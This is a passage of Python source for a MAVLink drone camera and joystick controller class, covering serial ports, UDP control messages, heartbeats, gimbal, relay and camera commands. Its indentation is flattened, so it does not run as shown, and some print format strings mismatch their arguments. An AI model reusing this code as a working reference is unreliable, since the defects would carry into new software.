image_index = 4 # Zero based index of this image (image count since armed -1)
camera_id = 1 # Camera ID (1 for first, 2 for second, etc.)
capture_result = 1 # Boolean indicating success (1) or failure (0) while capturing this image.
file_url = "http://10.1.2.3/img/1.jpg"
# camera feedback
time_usec = 10000
cam_idx = 1
img_idx = 1
# already lat,
lng = lon
alt_msl = 2
alt_rel = 4
roll = 6
pitch = 1
yaw = 2
foc_len = 7
CFflags = 3
ACK_ERROR = 0
errRCV_COMMAND = 0
errRPM2 = 0
# task control flag
#
task_control_1 = 0
# global constants
#
GOT_ERROR = 1
GOT_SUCCESS = 2
GOT_BAD = 3
GOT_UNFORMAT = 4
# used to decide what is being requested from the calling (GCS) station
#
type_of_msg = 0
g_count = 0
pin_no = 0
# defines for camera ID file
#
CAM_XML_FILE = "alpha_cam_new.xml"
NETWORK_ID = 1
def __init__(self, pinNum=26):
#self.setUPPiRelayNumBCM()
#self.setPinINput(pinNum)
MAVFrame.pin_no=pinNum
def __del__(self):
class_name = self.__class__.__name__
print('{} Deleted'.format(class_name))
#
# check our operating system
#
def check_os( self ):
if ((sys.platform=='linux2') or (sys.platform=='linux')): return 1
elif sys.platform=='win32': return 2
else: return 3
def update_utc_label( self ):
if (self.check_os() == 1):
cmd = "date +%s"
self.time_utc = os.popen(cmd).read()
def update_uptime_label( self ):
if (self.check_os() == 1):
cmd = "uptime"
upTimStr = os.popen(cmd).read().split(",")
dd = upTimStr[0].split()
days = int(dd[2])
xx = dd[0].split(":")
hours = int(xx[0])
mins = int(xx[1])
secs = int(xx[2])
self.time_boot_ms = (days*60*60*24) + (hours*60*60) + (mins*60) + secs
#print(f"boot tim {self.time_boot_ms} { (days*60*60*24) + (hours*60*60) + (mins*60) + secs }")
def on_click_connect(self,e):
#"""
#Process a click on the CONNECT button
#Attempt to connect to the MAV using the specified port and baud rate,
#then subscribe a function called check_heartbeat that will listen for
#a heartbeat message, as well as a function that will print all incoming
#MAVLink messages to the console.
#"""
port = self.cb_port.GetValue()
baud = int(self.cb_baud.GetValue())
self.textOutput.AppendText("Connecting to " + port + " at " + str(baud) + " baud\n")
self.master = mavutil.mavlink_connection(port, baud=baud)
self.thread = threading.Thread(target=self.process_messages)
self.thread.daemon = True # setDaemon() is deprecated in newer Python versions
self.thread.start()
self.master.message_hooks.append(self.check_heartbeat)
self.master.message_hooks.append(self.check_rcv_data_msg)
self.master.message_hooks.append(self.log_message)
print("Connecting to " + port + " at " + str(baud) + "baud")
self.textOutput.AppendText("Waiting for APM heartbeat\n")
return
def on_click_arm(self,e):
#"""
#Process a click on the ARM button
#Send an arm message to the MAV, then subscribe a function called
#check_arm_ack that will listen for a positive confirmation of arming.
# """
self.textOutput.AppendText("Arming motor\n")
print("******arming motor*********")
self.master.arducopter_arm()
self.master.message_hooks.append(self.check_arm_ack)
def log_message(self,caller,msg):
if msg.get_type() != 'BAD_DATA':
print(str(msg))
return
def process_messages(self):
#"""
#This runs continuously. The mavutil.recv_match() function will call mavutil.post_message()
#any time a new message is received, and will notify all functions in the master.message_hooks list.
#"""
while True:
msg = self.master.recv_match(blocking=True)
if not msg:
return
if msg.get_type() == "BAD_DATA":
if mavutil.all_printable(msg.data):
sys.stdout.write(msg.data)
sys.stdout.flush()
def check_heartbeat(self,caller,msg):
#"""
#Listens for a heartbeat message
#Once this function is subscribed to the dispatcher, it listens to every
#incoming MAVLINK message and watches for a 'HEARTBEAT' message. Once
#that message is received, the function updates the GUI and then
# unsubscribes itself.
#" ""
if msg.get_type() == 'HEARTBEAT':
self.textOutput.AppendText("Heartbeat received from APM (system %u component %u)\n" % (self.master.target_system, self.master.target_component))
self.master.message_hooks.remove(self.check_heartbeat)
def check_arm_ack(self, caller, msg):
#"""
#Listens for confirmation of motor arming
#Once this function is subscribed to the dispatcher, it listens to every
#incoming MAVLINK message and watches for the "Motor armed!" confirmation.
#Once the message is received, the function updates the GUI and then
#unsubscribes itself.
#"""
if msg.get_type() == 'STATUSTEXT':
if "Throttle armed" in msg.text:
self.textOutput.AppendText("Motor armed!")
self.master.message_hooks.remove(self.check_arm_ack)
def check_rcv_data_msg(self, caller, msg):
if msg.get_type() == 'RC_CHANNELS':
self.textOutput.AppendText("RC Channel message (system %u component %u)\n" % (self.master.target_system, self.master.target_component))
self.textOutput.AppendText("chan1 %u chan2 %u\n" % (msg.chan1_raw, msg.chan2_raw))
self.master.message_hooks.remove(self.check_rcv_data_msg)
elif msg.get_type() == 'COMMAND_LONG':
self.textOutput.AppendText("Long message received (system %u component %u)\n" % (self.master.target_system, self.master.target_component))
self.textOutput.AppendText("Command %u p1 %u p2 %u p3 %u p4 %u \n" % (msg.command, msg.param1, msg.param2, msg.param3, msg.param4))
self.textOutput.AppendText("p5 %u p6 %u p7 %u \n" % (msg.param5, msg.param6, msg.param7))
self.master.message_hooks.remove(self.check_rcv_data_msg)
elif msg.get_type() == 'CAMERA_IMAGE_CAPTURED':
self.textOutput.AppendText("Cam Cap message received (system %u component %u)\n" % (self.master.target_system, self.master.target_component))
self.textOutput.AppendText("lat %u lon %u alt %u\n" % (msg.lat, msg.lon, msg.alt))
self.textOutput.AppendText("URL %s\n" % (msg.file_url))
self.master.message_hooks.remove(self.check_rcv_data_msg)
def OnClose(self, e):
self._mgr.UnInit()
self.Close()
def serial_ports(self):
#"""Lists all available serial ports
#:raises EnvironmentError:
# On unsupported or unknown platforms
#:returns:
# A list of available serial ports
#"""
if 'ANDROID_BOOTLOGO' in os.environ: # detect android first as if using sys alone, it returns linux
#if platform == 'android': using kivy instead
ports = ['/dev/ttyACM0'] # keep this a list so the loop below iterates over ports, not characters
else:
if sys.platform.startswith('win'):
ports = ['COM' + str(i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('linux2') or sys.platform.startswith('cygwin'): # check this shows /dev/ttyAMA0 on raspberry pi.
# this is to exclude your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'): # apple mac support if using darwin
ports = glob.glob('/dev/tty.*')
else:
ports = [p.device for p in list_ports.comports()] # fall back to pyserial for the rest e.g. riscos atheos os2 freebsd aix etc
if len(ports) == 0:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
if 'ANDROID_BOOTLOGO' in os.environ: # device android
s = CdcAcmSerialPort(port)
s.close()
result.append(port)
else:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
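#
# usage sketch: list the serial ports that can actually be opened on this machine
#
#   frame = MAVFrame()
#   print(frame.serial_ports())   # e.g. ['COM3'] on windows or ['/dev/ttyUSB0'] on linux
#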
def print_red(self,text,value):
print("\033[31m %s : %6.3f"%(text,value))
def print_yellow(self,text,value):
print("\033[33m %s : %6.3f"%(text,value))
def print_2_yellow(self,text,value1,value2):
print("\033[33m %s : %6.3f %6.3f"%(text,value1,value2))
def print_3_yellow(self,text,value1,value2,value3):
print("\033[33m %s : %6.3f %6.3f %6.3f"%(text,value1,value2,value3))
def print_3_blue(self,text,value1,value2,value3):
print("\033[34m %s %6.3f %6.3f %6.3f"%(text,value1,value2,value3))
def print_blue(self,text,value):
print("\033[34m %s : %6.3f"%(text,value))
def joystickInit(self):
pygame.init()
# Set the width and height of the screen [width,height]
size = [500, 700]
self.screen = pygame.display.set_mode(size)
pygame.display.set_caption("----- My test of mavlink and joystick -----")
# Used to manage how fast the screen updates
self.clock = pygame.time.Clock()
# Initialize the joysticks
pygame.joystick.init()
self.joystick = pygame.joystick.Joystick(0)
self.joystick.init()
# Get ready to print (TextPrint is the small pygame text helper from the original example)
self.textPrint = TextPrint()
def initUDPSocket(self,bind):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# bind the socket if this is a server (pass bind==1)
if bind == 1:
host = 'localhost'
port = JOYSTICK_UDP_PORT
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
addr = (host,port)
sock.bind(addr)
sock.setblocking(0)
return sock
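#
# usage sketch: bind==1 returns a bound, non-blocking listener on JOYSTICK_UDP_PORT, bind==0
# returns a plain client socket for sendto(); because the listener is non-blocking a real
# caller would poll or retry recvfrom()
#
#   frame = MAVFrame()
#   srv = frame.initUDPSocket(1)
#   cli = frame.initUDPSocket(0)
#   cli.sendto(b'hello', ('localhost', JOYSTICK_UDP_PORT))
#   data, addr = srv.recvfrom(1024)
#   frame.closeUDPSocket(cli)
#   frame.closeUDPSocket(srv)
#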
def closeUDPSocket(self,udp_socket):
udp_socket.close()
def serverReadUDPSocket(self,udp_socket,port):
conn, addr = udp_socket.recvfrom(port)
return conn,addr
def clientReadUDPSocket(self,udp_socket,port):
dataV = udp_socket.recvfrom(port)
return dataV
def joyMavlinkInit(self):
self.mav = mavutil.mavlink.MAVLink(fifo())
self.mav.srcSystem = MAV_SOURCE # set to master
return self.mav
def blockMouseDown(self,block_flag):
if block_flag:
pygame.event.set_blocked(pygame.MOUSEBUTTONDOWN)
else:
pygame.event.set_allowed(pygame.MOUSEBUTTONDOWN)
def blockMouseUp(self,block_flag):
if block_flag:
pygame.event.set_blocked(pygame.MOUSEBUTTONUP)
else:
pygame.event.set_allowed(pygame.MOUSEBUTTONUP)
def checkMouseDwnBlock(self):
print ('MOUSEBUTTONDOWN is blocked: ', pygame.event.get_blocked(pygame.MOUSEBUTTONDOWN))
def checkMouseUpBlock(self):
print ('MOUSEBUTTONUP is blocked: ', pygame.event.get_blocked(pygame.MOUSEBUTTONUP))
def write_mav_serial_data(self, serial, x ):
serial.write(x) # x is an already packed mavlink message buffer
def write_pack_serial_data(self, serial, x, y, z, roll, pitch, yaw):
serial.write(struct.pack('<chhhhhh', b'S', x, y, z, roll, pitch, yaw))
def test_linear(self, serial, length=200, times=1000, delta=0.05):
for angle in range(1, times, 5):
a = angle * math.pi / 180
self.write_pack_serial_data(serial, int(length * math.cos(a)), int(length * math.sin(a)),0,0,0,0)
time.sleep(delta)
self.write_pack_serial_data(serial, 0,0,0,0,0,0)
def test_angles(self, serial, length=200, times=1000, delta=0.05):
for angle in range(1, times, 5):
a = angle * math.pi / 180
self.write_pack_serial_data(serial, 0,0,0,int(30 * math.cos(a)),int(30 * math.sin(-a)),0)
time.sleep(delta)
self.write_pack_serial_data(serial, 0,0,0,0,0,0)
def test_yaw(self, serial, length=200, times=1000, delta=0.05):
for angle in range(1, times, 5):
a = angle * math.pi / 180
self.write_pack_serial_data(serial, int(length * math.cos(a)),0,0,int(30 * math.sin(a)),0,0)
time.sleep(delta)
self.write_pack_serial_data(serial, 0,0,0,0,0,0)
def processJoystickSendMavlink(self,sock):
msgbuf = None
done = False
# bind the objects created by joystickInit() / joyMavlinkInit() (assumes both were called first)
joystick = self.joystick
screen = self.screen
clock = self.clock
textPrint = self.textPrint
mav = self.mav
WHITE = (255, 255, 255)
# -------- Main Program Loop -----------
while done == False:
btns = 0
thrust = 0.0
rudder = 0.0
# EVENT PROCESSING STEP
for event in pygame.event.get(): # User did something
screen.fill(WHITE)
textPrint.reset()
# Possible joystick actions: JOYAXISMOTION JOYBALLMOTION JOYBUTTONDOWN JOYBUTTONUP JOYHATMOTION
# QUIT - none
# ACTIVEEVENT - gain, state
# KEYDOWN - unicode, key, mod
# KEYUP - key, mod
# MOUSEMOTION - pos, rel, buttons
# MOUSEBUTTONUP - pos, button
# MOUSEBUTTONDOWN - pos, button
# JOYAXISMOTION - joy, axis, value
# JOYBALLMOTION - joy, ball, rel
# JOYHATMOTION - joy, hat, value
# JOYBUTTONUP - joy, button
# JOYBUTTONDOWN - joy, button
# VIDEORESIZE - size, w, h
# VIDEOEXPOSE - none
# USEREVENT – code
if event.type == pygame.QUIT:
done=True
elif event.type == pygame.MOUSEBUTTONDOWN:
self.print_2_yellow("Mouse button down pressed.",event.button,event.pos)
elif event.type == pygame.MOUSEBUTTONUP:
self.print_2_yellow("Mouse button up released.",event.button,event.pos)
elif event.type == pygame.JOYBUTTONDOWN:
self.print_2_yellow("Joystick button down pressed.",event.button,event.joy)
elif event.type == pygame.JOYBUTTONUP:
self.print_2_yellow("Joystick button up released.",event.button,event.joy)
elif event.type == pygame.JOYAXISMOTION:
self.print_3_yellow("Joystick axis motion.",event.joy,event.axis,event.value)
elif event.type == pygame.JOYBALLMOTION:
self.print_3_yellow("Joystick ball motion.",event.joy,event.ball,event.rel)
elif event.type == pygame.JOYHATMOTION:
self.print_3_yellow("Joystick hat motion",event.joy,event.hat,event.value)
elif event.type == pygame.VIDEORESIZE:
self.print_3_blue("video re-size.",event.size,event.w,event.h)
elif event.type == pygame.KEYDOWN:
self.print_3_yellow("key down ",event.unicode,event.key,event.mod)
elif event.type == pygame.KEYUP:
self.print_2_yellow("key up ",event.key,event.mod)
# Get the name from the OS for the controller/joystick
name = joystick.get_name()
print("Joystick name: {}".format(name) )
# get the buttons
buttons = joystick.get_numbuttons()
for i in range( buttons ):
button = joystick.get_button( i )
print( "Button {:>2} value: {}".format(i,button) )
# get the hats
# Hat switch. All or nothing for direction, not like joysticks.
# Value comes back in an array.
hats = joystick.get_numhats()
print( "Number of hats: {}".format(hats) )
textPrint.indent()
for i in range( hats ):
hat = joystick.get_hat( i )
print( "Hat {} value: {}".format(i, str(hat)) )
# Getting available devices
for id in range(pygame.joystick.get_count()):
print( "devices list : %u %d %s" % (id, pygame.joystick.Joystick(id).get_name()))
# Get thrust and brake first
# mix 2 shifts in single channels
thr = (joystick.get_axis(5) + 1) / 2
brk = -(joystick.get_axis(2) + 1) / 2
thrust = thr + brk
self.print_yellow("Thrust value ",thrust)
# this is the x axis
rudder = joystick.get_axis(0)
self.print_blue("Rudder value ",rudder)
# now collect all buttons
btns = 0
for i in range(joystick.get_numbuttons()):
btns |= joystick.get_button(i) << i
# Usually axis run in pairs, up/down for one, and left/right for
# the other.
axes = joystick.get_numaxes()
print( "Number of axes: {}".format(axes) )
textPrint.indent()
for i in range( axes ):
axis = joystick.get_axis( i )
print( "Axis {} value: {:>6.3f}".format(i, axis) )
textPrint.unindent()
# Update events in pygame
pygame.event.pump()
# pack acquired data and throw it to socket
msg = mavutil.mavlink.MAVLink_manual_control_message( target = MAV_TARGET, x = X_MAX, y = Y_MAX, z = round(thrust*JOY_SCALE), r = round(rudder*JOY_SCALE), buttons = btns)
msgbuf = msg.pack(mav)
try:
jid = joystick.get_instance_id()
except AttributeError:
# get_instance_id() is an SDL2 method
jid = joystick.get_id()
print( "Joystick {}".format(jid))
try:
guid = joystick.get_guid()
except AttributeError:
# get_guid() is an SDL2 method
pass
else:
print("GUID: {}".format(guid))
# Limit the loop to 25 frames per second
clock.tick(25)
if msgbuf:
# send the message on the UDP Port
sock.sendto(msgbuf, ('', JOYSTICK_UDP_PORT))
# send the message on serial
# write_mav_serial_data(serial, msgbuf)
# Close the window and quit.
# If you forget this line, the program will 'hang'
# on exit if running from IDLE.
pygame.joystick.quit()
pygame.quit()
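#
# putting the joystick pieces together (sketch: joystickInit() and joyMavlinkInit() must be
# called first so that self.joystick / self.mav exist, and a joystick must be plugged in)
#
#   frame = MAVFrame()
#   frame.joystickInit()
#   frame.joyMavlinkInit()
#   sock = frame.initUDPSocket(0)            # client socket, MANUAL_CONTROL goes out on 14556
#   frame.processJoystickSendMavlink(sock)   # loops until the pygame window is closed
#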
# make a mavlink connection using mavutil like ardusub does....
#
# Create the connection and return it for use with the other functions
#
# TODO::: change the port and see if this can run entirely parallel with camera
# take picture on another port
#
def makeMAVlinkConn(self):
try:
#the_connection = mavutil.mavlink_connection('udpin:0.0.0.0:14560',autoreconnect=True)
the_connection = mavutil.mavlink_connection('udpin:0.0.0.0:14550',autoreconnect=True, source_system=1, source_component=100)
return the_connection,True
except Exception as err_msg:
print("Failed to connect : %s" % (err_msg))
return None,False
def makeNewMAVlinkConn(self,id):
try:
#the_connection = mavutil.mavlink_connection('udpin:0.0.0.0:14560',autoreconnect=True, source_system=id)
the_connection = mavutil.mavlink_connection('udpin:0.0.0.0:14550',autoreconnect=True, source_system=id, source_component=100)
return the_connection,True
except Exception as err_msg:
print("Failed to connect : %s" % (err_msg))
return None,False
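#
# connection usage sketch: create the UDP listener, wait for the autopilot heartbeat and then
# answer with our own camera-type heartbeat (see the heartbeat helpers just below)
#
#   frame = MAVFrame()
#   the_connection, ok = frame.makeMAVlinkConn()
#   if ok and frame.mavlink_rcv_heartbeat(the_connection):
#       frame.mavlink_send_GCS_heartbeat(the_connection)
#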
# Send heartbeat from a GCS (types are define as enum in the dialect file).
#
def mavlink_send_GCS_heartbeat(self, the_conection):
print(" heartbeat.............................. %s\n"%(mavutil.mavlink.MAV_TYPE_CAMERA))
try:
the_conection.mav.heartbeat_send(mavutil.mavlink.MAV_TYPE_CAMERA, mavutil.mavlink.MAV_AUTOPILOT_INVALID, 0, 0, mavutil.mavlink.MAV_STATE_ACTIVE)
ret = True
except Exception as err_msg:
print("Failed to send GCS heartbeat : %s" % (err_msg))
ret = False
return ret
# Send heartbeat from a MAVLink application.
#
def mavlink_send_OBC_heartbeat2(self, the_connection):
try:
the_connection.mav.heartbeat_send(mavutil.mavlink.MAV_TYPE_CAMERA, mavutil.mavlink.MAV_AUTOPILOT_GENERIC, 0, 0, 0)
ret = True
except Exception as err_msg:
print("Failed to send OBC heartbeat : %s" % (err_msg))
ret = False
return ret
# Receive heartbeat from a MAVLink application.
#
def mavlink_rcv_heartbeat(self, the_connection):
try:
the_connection.wait_heartbeat()
ret = True
except Exception as err_msg:
print("Failed to wait for heartbeat : %s" % (err_msg))
ret = False
return ret
# Sets a value to the rc channel
#
def mavlink_set_rc_channel_pwm(self, the_connection, channel_id, pwm=1500):
#""" Set RC channel pwm value
#Args:
# channel_id (TYPE): Channel ID
# pwm (int, optional): Channel pwm value 1100-1900
#"""
if channel_id < 1 or channel_id > 18:
print("Channel does not exist.")
return
# Mavlink 2 supports up to 18 channels:
# https://mavlink.io/en/messages/common.html#RC_CHANNELS_OVERRIDE
rc_channel_values = [65535 for _ in range(18)]
rc_channel_values[channel_id - 1] = pwm
try:
the_connection.mav.rc_channels_override_send( the_connection.target_system, the_connection.target_component, *rc_channel_values )
ret = True
except Exception as err_msg:
print("Failed to set RC Chan PWM : %s" % (err_msg))
ret = False
return ret
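#
# usage sketch: push channel 3 to 1600us; every other channel is sent as 65535, which the
# autopilot treats as "leave this channel unchanged"
#
#   frame.mavlink_set_rc_channel_pwm(the_connection, channel_id=3, pwm=1600)
#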
# drives a gimbal axis controller to the pitch roll yaw specified
#
def gimbal_move_to( self, the_connection, tilt=0, roll=0, pan=0):
#"""
#Moves gimbal to given position
try:
the_connection.mav.command_long_send(the_connection.target_system, the_connection.target_component, mavutil.mavlink.MAV_CMD_DO_MOUNT_CONTROL, 1, tilt, roll, pan, 0, 0, 0, mavutil.mavlink.MAV_MOUNT_MODE_MAVLINK_TARGETING)
ret = True
except Exception as err_msg:
print("Failed to move gimbal using command long : %s" % (err_msg))
ret = False
return ret
def mavlink10(self,connID):
# '''return True if using MAVLink 1.0 or later'''
return float(connID.WIRE_PROTOCOL_VERSION) >= 1
def mavlink20(self,connID):
# '''return True if using MAVLink 2.0 or later'''
return float(connID.WIRE_PROTOCOL_VERSION) >= 2
# Set relay_pin to value of state
def mavlink_set_relay(self, the_connection, relay_pin=0, state=True):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_DO_SET_RELAY, # command
0, # Confirmation
relay_pin, # Relay Number
int(state), # state (1 to indicate arm)
0, # param3 (all other params meaningless)
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to set relay using command long : %s" % (err_msg))
ret = False
return ret
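#
# usage sketch: close relay 0 then open it again (state is carried in param2 of MAV_CMD_DO_SET_RELAY)
#
#   frame.mavlink_set_relay(the_connection, relay_pin=0, state=True)
#   frame.mavlink_set_relay(the_connection, relay_pin=0, state=False)
#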
# ref:- https://mavlink.io/en/messages/common.html#MAV_CMD
def mavlink_video_stop_capture(self, the_connection, streamNo):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_VIDEO_STOP_CAPTURE, # command
0, # Confirmation
streamNo, # stream number
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to stop video capture using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_video_start_capture(self, the_connection, streamNo, freq):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_VIDEO_START_CAPTURE, # command
0, # Confirmation
streamNo, # stream number
freq, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to start video capture using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_image_stop_capture(self, the_connection):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_IMAGE_STOP_CAPTURE, # command
0, # Confirmation
0, # param1
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to stop image capture using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_image_start_capture(self, the_connection, interval, totalImages, seqNo):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_IMAGE_START_CAPTURE, # command
0, # Confirmation
0, # param1
interval, # Desired elapsed time between two consecutive pictures (in seconds)
totalImages, # Total number of images to capture. 0 to capture forever/until MAV_CMD_IMAGE_STOP_CAPTURE.
seqNo, # Capture sequence number starting from 1. This is only valid for single-capture (param3 == 1), otherwise set to 0. Increment the capture ID for each capture command to prevent double captures when a command is re-transmitted
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to start image capture using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_video_stop_streaming(self, the_connection, streamNo):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_VIDEO_STOP_STREAMING, # command
0, # Confirmation
streamNo, # stream number
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to send stop streaming using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_do_ftp_send(self, the_connection, network, payload):
MAX_CHUNK_BYTES = 251
# round up so that a final partial chunk is still sent (zero padded)
numOfchunk = math.ceil(len(payload) / MAX_CHUNK_BYTES)
for i in range(numOfchunk):
#print(f"ftp send chunk {i} offset {i*MAX_CHUNK_BYTES}")
msgpay = []
for b in range(MAX_CHUNK_BYTES):
try:
msgpay.append(payload[b+(i*MAX_CHUNK_BYTES)])
except Exception as e:
msgpay.append(0) # zero pad the last chunk
try:
the_connection.mav.file_transfer_protocol_send (
network,
the_connection.target_system, # target_system
the_connection.target_component, # target_component
msgpay )
except Exception as e:
print(f" ftp send exception {e} \nchunk {i} @ offset {i*MAX_CHUNK_BYTES}")
def mavlink_video_start_streaming(self, the_connection, streamNo):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_VIDEO_START_STREAMING, # command
0, # Confirmation
streamNo, # stream number
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to send start streaming using command long : %s" % (err_msg))
ret = False
return ret
# suitable variables to drive CamMode
#
MAV_CAMERA_MODE_IMAGE = 0
MAV_CAMERA_MODE_VIDEO = 1
MAV_CAMERA_MODE_IMAGE_SURVEY = 2
def mavlink_video_set_camera_mode(self, the_connection, camMode):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_SET_CAMERA_MODE, # command
0, # Confirmation
0, # param1
camMode, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to send video set camera mode using command long : %s" % (err_msg))
ret = False
return ret
# suitable variables to drive CamZoomType
#
MAV_ZOOM_TYPE_STEP = 0 # Zoom one step increment (-1 for wide, 1 for tele)
MAV_ZOOM_TYPE_CONTINUOUS = 1 # Continuous zoom up/down until stopped (-1 for wide, 1 for tele, 0 to stop zooming)
MAV_ZOOM_TYPE_RANGE = 2 # Zoom value as proportion of full camera range (a value between 0.0 and 100.0)
MAV_ZOOM_TYPE_FOCAL_LENGTH = 3 # Zoom value/variable focal length in millimetres
def mavlink_video_set_camera_zoom(self, the_connection, camZoomType, camZoomValue):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_SET_CAMERA_ZOOM, # command
0, # Confirmation
camZoomType, # param1
camZoomValue, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to send camera zoom using command long : %s" % (err_msg))
ret = False
return ret
MAV_FOCUS_TYPE_STEP = 0 # Focus one step increment (-1 for focusing in, 1 for focusing out towards infinity).
MAV_FOCUS_TYPE_CONTINUOUS = 1 # Continuous focus up/down until stopped (-1 for focusing in, 1 for focusing out towards infinity, 0 to stop focusing)
MAV_FOCUS_TYPE_RANGE = 2 # Focus value as proportion of full camera focus range (a value between 0.0 and 100.0)
MAV_FOCUS_TYPE_METERS = 3 # Focus value in metres
def mavlink_video_set_camera_focus(self, the_connection, camFocusType, camFocusValue):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_SET_CAMERA_FOCUS, # command
0, # Confirmation
camFocusType, # param1
camFocusValue, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to send camera focus using command long : %s" % (err_msg))
ret = False
return ret
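#
# usage sketch: the MAV_ZOOM_TYPE_* / MAV_FOCUS_TYPE_* constants above select how the value in
# param2 is interpreted; here both zoom and focus are driven as a percentage of the full range
#
#   frame.mavlink_video_set_camera_zoom(the_connection, frame.MAV_ZOOM_TYPE_RANGE, 50.0)
#   frame.mavlink_video_set_camera_focus(the_connection, frame.MAV_FOCUS_TYPE_RANGE, 30.0)
#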
def mavlink_do_digicam_configure(self, the_connection, camMode, camShutterSpeed, camAperture, camISO, camExposure, camCommandIdentity, camEngineCutOff):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_DO_DIGICAM_CONFIGURE, # command
0, # Confirmation
camMode, # param1
camShutterSpeed, # param2
camAperture, # param3
camISO, # param4
camExposure, # param5
camCommandIdentity, # param6
camEngineCutOff) # param7
ret = True
except Exception as err_msg:
print("Failed to send digicam configure using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_do_digicam_control(self, the_connection, camSessionControl, camZoomAbsolute, camZoomRelative, camFocus, camShootCommand, camCommandIdentity, camShotID):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_DO_DIGICAM_CONTROL, # command
0, # Confirmation
camSessionControl, # param1
camZoomAbsolute, # param2
camZoomRelative, # param3
camFocus, # param4
camShootCommand, # param5
camCommandIdentity, # param6
camShotID) # param7
ret = True
except Exception as err_msg:
print("Failed to send digicam control using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_do_video_control(self, the_connection, camID, camTransmission, camInterval, camRecording):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_DO_CONTROL_VIDEO, # command
0, # Confirmation
camID, # param1
camTransmission, # param2
camInterval, # param3
camRecording, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to send do video control using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_get_camera_settings(self, the_connection):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_REQUEST_CAMERA_SETTINGS, # command
0, # Confirmation
1, # param1
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to get cam settings using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_get_storage_info(self, the_connection, StoId):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_REQUEST_STORAGE_INFORMATION, # command
0, # Confirmation
StoId, # param1
1, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to get storage info using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_get_capture_status(self, the_connection):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_REQUEST_CAMERA_CAPTURE_STATUS, # command
0, # Confirmation
1, # param1
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to get capture status using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_get_stream_info(self, the_connection):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
